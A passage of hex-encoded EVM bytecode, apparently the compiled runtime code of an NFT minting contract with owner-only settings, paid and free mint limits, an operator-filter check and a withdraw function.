ffffffffffffffffffff161480610d7c5750610d2b6128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610dbb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db290614647565b60405180910390fd5b80600f8190555050565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610f95573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e3757610e328484846129d6565b610fa1565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610e809291906146c7565b602060405180830381865afa158015610e9d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ec19190614705565b8015610f5357506daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610f119291906146c7565b602060405180830381865afa158015610f2e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610f529190614705565b5b610f9457336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610f8b9190614097565b60405180910390fd5b5b610fa08484846129d6565b5b50505050565b600e5481565b610fb56128c9565b73ffffffffffffffffffffffffffffffffffffffff16610fd361191e565b73ffffffffffffffffffffffffffffffffffffffff1614806110495750610ff86128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611088576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107f90614647565b60405180910390fd5b80600c908051906020019061109e929190613d2a565b5050565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115611282573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036111245761111f8484846040518060200160405280600081525061201d565b61129e565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161116d9291906146c7565b602060405180830381865afa15801561118a573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111ae9190614705565b801561124057506daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016111fe9291906146c7565b602060405180830381865afa15801561121b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061123f9190614705565b5b61128157336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016112789190614097565b60405180910390fd5b5b61129d8484846040518060200160405280600081525061201d565b5b50505050565b600d5481565b6112b26128c9565b73ffffffffffffffffffffffffffffffffffffffff166112d061191e565b73ffffffffffffffffffffffffffffffffffffffff16148061134657506112f56128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611385576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137c90614647565b60405180910390fd5b80600d8190555050565b6113976128c9565b73ffffffffffffffffffffffffffffffffffffffff166113b561191e565b73ffffffffffffffffffffffffffffffffffffffff16148061142b57506113da6128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61146a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161146190614647565b60405180910390fd5b80600a9080519060200190611480929190613d2a565b5050565b61148c6128c9565b73ffffffffffffffffffffffffffffffffffffffff166114aa61191e565b73ffffffffffffffffffffffffffffffffffffffff16148061152057506114cf6128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61155f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161155690614647565b60405180910390fd5b6000479050600061156e6128c9565b73ffffffffffffffffffffffffffffffffffffffff168260405161159190614763565b60006040518083038185875af1925050503d80600081146115ce576040519150601f19603f3d011682016040523d82523d6000602084013e6115d3565b606091505b5050905080611617576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160e906147c4565b60405180910390fd5b5050565b601160009054906101000a900460ff1681565b600061163982612ec5565b600001519050919050565b600a805461165190614696565b80601f016020809104026020016040519081016040528092919081815260200182805461167d90614696565b80156116ca5780601f1061169f576101008083540402835291602001916116ca565b820191906000526020600020905b8154815290600101906020018083116116ad57829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611739576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a900467ffffffffffffffff1667ffffffffffffffff169050919050565b6117a96128c9565b73ffffffffffffffffffffffffffffffffffffffff166117c761191e565b73ffffffffffffffffffffffffffffffffffffffff161461181d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161181490614647565b60405180910390fd5b6118276000613154565b565b6118316128c9565b73ffffffffffffffffffffffffffffffffffffffff1661184f61191e565b73ffffffffffffffffffffffffffffffffffffffff1614806118c557506118746128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611904576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118fb90614647565b60405180910390fd5b61191561190f6128c9565b8261321a565b50565b600f5481565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6119506128c9565b73ffffffffffffffffffffffffffffffffffffffff1661196e61191e565b73ffffffffffffffffffffffffffffffffffffffff1614806119e457506119936128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611a23576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a1a90614647565b60405180910390fd5b80600b9080519060200190611a39929190613d2a565b5050565b606060038054611a4c90614696565b80601f0160208091040260200160405190810160405280929190818152602001828054611a7890614696565b8015611ac55780601f10611a9a57610100808354040283529160200191611ac5565b820191906000526020600020905b815481529060010190602001808311611aa857829003601f168201915b5050505050905090565b6000611ad96128c9565b9050601160009054906101000a900460ff1615611b2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b2290614830565b60405180910390fd5b81611b34610cc9565b611b3e919061487f565b600f541015611b82576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b7990614921565b60405180910390fd5b60008211611bc5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bbc9061498d565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff1614611c33576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c2a906149f9565b60405180910390fd5b81600a1015611c77576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c6e90614a65565b60405180910390fd5b611c7f610cc9565b600e5410611cd15781600d541015611ccc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cc390614ad1565b60405180910390fd5b611d65565b81600a1015611d15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d0c90614a65565b60405180910390fd5b3460105483611d249190614af1565b14611d64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d5b90614b97565b60405180910390fd5b5b611d6f818361321a565b5050565b60105481565b611d816128c9565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611de5576040517fb06307db00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060076000611df26128c9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611e9f6128c9565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611ee49190613ec4565b60405180910390a35050565b611ef86128c9565b73ffffffffffffffffffffffffffffffffffffffff16611f1661191e565b73ffffffffffffffffffffffffffffffffffffffff161480611f8c5750611f3b6128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611fcb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fc290614647565b60405180910390fd5b60008151905060005b81811015612018576000838281518110611ff157611ff0614bb7565b5b6020026020010151905061200481613238565b50808061201090614be6565b915050611fd4565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115612258573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036120fa5761208a8585856129d6565b6120a98473ffffffffffffffffffffffffffffffffffffffff166135db565b80156120be57506120bc858585856135fe565b155b156120f5576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6122cf565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016121439291906146c7565b602060405180830381865afa158015612160573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906121849190614705565b801561221657506daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016121d49291906146c7565b602060405180830381865afa1580156121f1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906122159190614705565b5b61225757336040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161224e9190614097565b60405180910390fd5b5b6122638585856129d6565b6122828473ffffffffffffffffffffffffffffffffffffffff166135db565b80156122975750612295858585856135fe565b155b156122ce576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b5050505050565b600c80546122e390614696565b80601f016020809104026020016040519081016040528092919081815260200182805461230f90614696565b801561235c5780601f106123315761010080835404028352916020019161235c565b820191906000526020600020905b81548152906001019060200180831161233f57829003601f168201915b505050505081565b606061236f826128d1565b6123ae576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123a590614c7a565b60405180910390fd5b6000600a80546123bd90614696565b9050116123d95760405180602001604052806000815250612408565b600a6123e48361374e565b600c6040516020016123f893929190614d6a565b6040516020818303038152906040525b9050919050565b73a5409ec958c83c3f309868babaca7c86dcb077c181565b61242f6128c9565b73ffffffffffffffffffffffffffffffffffffffff1661244d61191e565b73ffffffffffffffffffffffffffffffffffffffff1614806124c357506124726128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b612502576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124f990614647565b60405180910390fd5b80600e8190555050565b6125146128c9565b73ffffffffffffffffffffffffffffffffffffffff1661253261191e565b73ffffffffffffffffffffffffffffffffffffffff1614806125a857506125576128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6125e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125de90614647565b60405180910390fd5b8060108190555050565b600b80546125fe90614696565b80601f016020809104026020016040519081016040528092919081815260200182805461262a90614696565b80156126775780601f1061264c57610100808354040283529160200191612677565b820191906000526020600020905b81548152906001019060200180831161265a57829003601f168201915b505050505081565b60008073a5409ec958c83c3f309868babaca7c86dcb077c190508273ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1663c4552791866040518263ffffffff1660e01b81526004016126e99190614097565b602060405180830381865afa158015612706573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061272a9190614dd9565b73ffffffffffffffffffffffffffffffffffffffff160361274f57600191505061275d565b61275984846138ae565b9150505b92915050565b61276b6128c9565b73ffffffffffffffffffffffffffffffffffffffff1661278961191e565b73ffffffffffffffffffffffffffffffffffffffff16146127df576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127d690614647565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361284e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161284590614e78565b60405180910390fd5b61285781613154565b50565b600a81565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b600033905090565b6000816128dc6129d1565b111580156128eb575060005482105b8015612918575060046000838152602001908152602001600020600001601c9054906101000a900460ff16155b9050919050565b826006600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b60006129e182612ec5565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff16612a086128c9565b73ffffffffffffffffffffffffffffffffffffffff161480612a3b5750612a3a8260000151612a356128c9565b61267f565b5b80612a805750612a496128c9565b73ffffffffffffffffffffffffffffffffffffffff16612a6884610b43565b73ffffffffffffffffffffffffffffffffffffffff16145b905080612ab9576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff1614612b22576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603612b88576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b612b958585856001613942565b612ba5600084846000015161291f565b6001600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160392506101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506001600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550836004600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426004600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166004600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603612e5557600054811015612e545782600001516004600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516004600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4612ebe8585856001613948565b5050505050565b612ecd613db0565b600082905080612edb6129d1565b11158015612eea575060005481105b1561311d576000600460008381526020019081526020016000206040518060600160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815260200160008201601c9054906101000a900460ff1615151515815250509050806040015161311b57600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614612fff57809250505061314f565b5b60011561311a57818060019003925050600460008381526020019081526020016000206040518060600160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815260200160008201601c9054906101000a900460ff1615151515815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff161461311557809250505061314f565b613000565b5b505b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b61323482826040518060200160405280600081525061394e565b5050565b600061324382612ec5565b905061325781600001516000846001613942565b613267600083836000015161291f565b600160056000836000015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160392506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600160056000836000015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff16021790555080600001516004600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426004600084815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600160046000848152602001908152602001600020600001601c6101000a81548160ff0219169083151502179055506000600183019050600073ffffffffffffffffffffffffffffffffffffffff166004600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603613552576000548110156135515781600001516004600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555081602001516004600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b5081600073ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46135c581600001516000846001613948565b6001600081548092919060010191905055505050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a026136246128c9565b8786866040518563ffffffff1660e01b81526004016136469493929190614eed565b6020604051808303816000875af192505050801561368257506040513d601f19601f8201168201806040525081019061367f9190614f4e565b60015b6136fb573d80600081146136b2576040519150601f19603f3d011682016040523d82523d6000602084013e6136b7565b606091505b5060008151036136f3576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b606060008203613795576040518060400160405280600181526020017f300000000000000000000000000000000000000000000000000000000000000081525090506138a9565b600082905060005b600082146137c75780806137b090614be6565b915050600a826137c09190614faa565b915061379d565b60008167ffffffffffffffff8111156137e3576137e26141a5565b5b6040519080825280601f01601f1916602001820160405280156138155781602001600182028036833780820191505090505b5090505b600085146138a25760018261382e9190614fdb565b9150600a8561383d919061500f565b6030613849919061487f565b60f81b81838151811061385f5761385e614bb7565b5b60200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350600a8561389b9190614faa565b9450613819565b8093505050505b919050565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b50505050565b50505050565b61395b8383836001613960565b505050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16036139cc576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008403613a06576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b613a136000868387613942565b83600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff16021790555083600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160088282829054906101000a900467ffffffffffffffff160192506101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550846004600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426004600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600081905060008582019050838015613bdd5750613bdc8773ffffffffffffffffffffffffffffffffffffffff166135db565b5b15613ca2575b818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4613c5260008884806001019550886135fe565b613c88576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b808203613be3578260005414613c9d57600080fd5b613d0d565b5b818060010192508773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4808203613ca3575b816000819055505050613d236000868387613948565b5050505050565b828054613d3690614696565b90600052602060002090601f016020900481019282613d585760008555613d9f565b82601f10613d7157805160ff1916838001178555613d9f565b82800160010185558215613d9f579182015b82811115613d9e578251825591602001919060010190613d83565b5b509050613dac9190613df3565b5090565b6040518060600160405280600073ffffffffffffffffffffffffffffffffffffffff168152602001600067ffffffffffffffff1681526020016000151581525090565b5b80821115613e0c576000816000905550600101613df4565b5090565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b613e5981613e24565b8114613e6457600080fd5b50565b600081359050613e7681613e50565b92915050565b600060208284031215613e9257613e91613e1a565b5b6000613ea084828501613e67565b91505092915050565b60008115159050919050565b613ebe81613ea9565b82525050565b6000602082019050613ed96000830184613eb5565b92915050565b613ee881613ea9565b8114613ef357600080fd5b50565b600081359050613f0581613edf565b92915050565b600060208284031215613f2157613f20613e1a565b5b6000613f2f84828501613ef6565b91505092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613f72578082015181840152602081019050613f57565b83811115613f81576000848401525b50505050565b6000601f19601f8301169050919050565b6000613fa382613f38565b613fad8185613f43565b9350613fbd818560208601613f54565b613fc681613f87565b840191505092915050565b60006020820190508181036000830152613feb8184613f98565b905092915050565b6000819050919050565b61400681613ff3565b811461401157600080fd5b50565b60008135905061402381613ffd565b92915050565b60006020828403121561403f5761403e613e1a565b5b600061404d84828501614014565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061408182614056565b9050919050565b61409181614076565b82525050565b60006020820190506140ac6000830184614088565b92915050565b6140bb81614076565b81146140c657600080fd5b50565b6000813590506140d8816140b2565b92915050565b600080604083850312156140f5576140f4613e1a565b5b6000614103858286016140c9565b925050602061411485828601614014565b9150509250929050565b61412781613ff3565b82525050565b6000602082019050614142600083018461411e565b92915050565b60008060006060848603121561416157614160613e1a565b5b600061416f868287016140c9565b9350506020614180868287016140c9565b925050604061419186828701614014565b9150509250925092565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6141dd82613f87565b810181811067ffffffffffffffff821117156141fc576141fb6141a5565b5b80604052505050565b600061420f613e10565b905061421b82826141d4565b919050565b600067ffffffffffffffff82111561423b5761423a6141a5565b5b61424482613f87565b9050602081019050919050565b82818337600083830152505050565b600061427361426e84614220565b614205565b90508281526020810184848401111561428f5761428e6141a0565b5b61429a848285614251565b509392505050565b600082601f8301126142b7576142b661419b565b5b81356142c7848260208601614260565b91505092915050565b6000602082840312156142e6576142e5613e1a565b5b600082013567ffffffffffffffff81111561430457614303613e1f565b5b614310848285016142a2565b91505092915050565b60006020828403121561432f5761432e613e1a565b5b600061433d848285016140c9565b91505092915050565b6000806040838503121561435d5761435c613e1a565b5b600061436b858286016140c9565b925050602061437c85828601613ef6565b9150509250929050565b600067ffffffffffffffff8211156143a1576143a06141a5565b5b602082029050602081019050919050565b600080fd5b60006143ca6143c584614386565b614205565b905080838252602082019050602084028301858111156143ed576143ec6143b2565b5b835b8181101561441657806144028882614014565b8452602084019350506020810190506143ef565b5050509392505050565b600082601f8301126144355761443461419b565b5b81356144458482602086016143b7565b91505092915050565b60006020828403121561446457614463613e1a565b5b600082013567ffffffffffffffff81111561448257614481613e1f565b5b61448e84828501614420565b91505092915050565b600067ffffffffffffffff8211156144b2576144b16141a5565b5b6144bb82613f87565b9050602081019050919050565b60006144db6144d684614497565b614205565b9050828152602081018484840111156144f7576144f66141a0565b5b614502848285614251565b509392505050565b600082601f83011261451f5761451e61419b565b5b813561452f8482602086016144c8565b91505092915050565b6000806000806080858703121561455257614551613e1a565b5b6000614560878288016140c9565b9450506020614571878288016140c9565b935050604061458287828801614014565b925050606085013567ffffffffffffffff8111156145a3576145a2613e1f565b5b6145af8782880161450a565b91505092959194509250565b600080604083850312156145d2576145d1613e1a565b5b60006145e0858286016140c9565b92505060206145f1858286016140c9565b9150509250929050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000614631602083613f43565b915061463c826145fb565b602082019050919050565b6000602082019050818103600083015261466081614624565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806146ae57607f821691505b6020821081036146c1576146c0614667565b5b50919050565b60006040820190506146dc6000830185614088565b6146e96020830184614088565b9392505050565b6000815190506146ff81613edf565b92915050565b60006020828403121561471b5761471a613e1a565b5b6000614729848285016146f0565b91505092915050565b600081905092915050565b50565b600061474d600083614732565b91506147588261473d565b600082019050919050565b600061476e82614740565b9150819050919050565b7f4661696c656420746f2073656e64000000000000000000000000000000000000600082015250565b60006147ae600e83613f43565b91506147b982614778565b602082019050919050565b600060208201905081810360008301526147dd816147a1565b9050919050565b7f5061757365640000000000000000000000000000000000000000000000000000600082015250565b600061481a600683613f43565b9150614825826147e4565b602082019050919050565b600060208201905081810360008301526148498161480d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061488a82613ff3565b915061489583613ff3565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156148ca576148c9614850565b5b828201905092915050565b7f416c6c20476f6e65000000000000000000000000000000000000000000000000600082015250565b600061490b600883613f43565b9150614916826148d5565b602082019050919050565b6000602082019050818103600083015261493a816148fe565b9050919050565b7f4e6f2030206d696e747300000000000000000000000000000000000000000000600082015250565b6000614977600a83613f43565b915061498282614941565b602082019050919050565b600060208201905081810360008301526149a68161496a565b9050919050565b7f4e6f20436f6e7472616374206d696e74696e672e000000000000000000000000600082015250565b60006149e3601483613f43565b91506149ee826149ad565b602082019050919050565b60006020820190508181036000830152614a12816149d6565b9050919050565b7f457863657373206d617820706572207061696420747800000000000000000000600082015250565b6000614a4f601683613f43565b9150614a5a82614a19565b602082019050919050565b60006020820190508181036000830152614a7e81614a42565b9050919050565b7f457863657373206d617820706572206672656520747800000000000000000000600082015250565b6000614abb601683613f43565b9150614ac682614a85565b602082019050919050565b60006020820190508181036000830152614aea81614aae565b9050919050565b6000614afc82613ff3565b9150614b0783613ff3565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615614b4057614b3f614850565b5b828202905092915050565b7f496e76616c69642066756e64732070726f766964656400000000000000000000600082015250565b6000614b81601683613f43565b9150614b8c82614b4b565b602082019050919050565b60006020820190508181036000830152614bb081614b74565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000614bf182613ff3565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203614c2357614c22614850565b5b600182019050919050565b7f546f6b656e20646f6573206e6f742065786973742e0000000000000000000000600082015250565b6000614c64601583613f43565b9150614c6f82614c2e565b602082019050919050565b60006020820190508181036000830152614c9381614c57565b9050919050565b600081905092915050565b60008190508160005260206000209050919050565b60008154614cc781614696565b614cd18186614c9a565b94506001821660008114614cec5760018114614cfd57614d30565b60ff19831686528186019350614d30565b614d0685614ca5565b60005b83811015614d2857815481890152600182019150602081019050614d09565b838801955050505b50505092915050565b6000614d4482613f38565b614d4e8185614c9a565b9350614d5e818560208601613f54565b80840191505092915050565b6000614d768286614cba565b9150614d828285614d39565b9150614d8e8284614cba565b9150819050949350505050565b6000614da682614076565b9050919050565b614db681614d9b565b8114614dc157600080fd5b50565b600081519050614dd381614dad565b92915050565b600060208284031215614def57614dee613e1a565b5b6000614dfd84828501614dc4565b91505092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614e62602683613f43565b9150614e6d82614e06565b604082019050919050565b600060208201905081810360008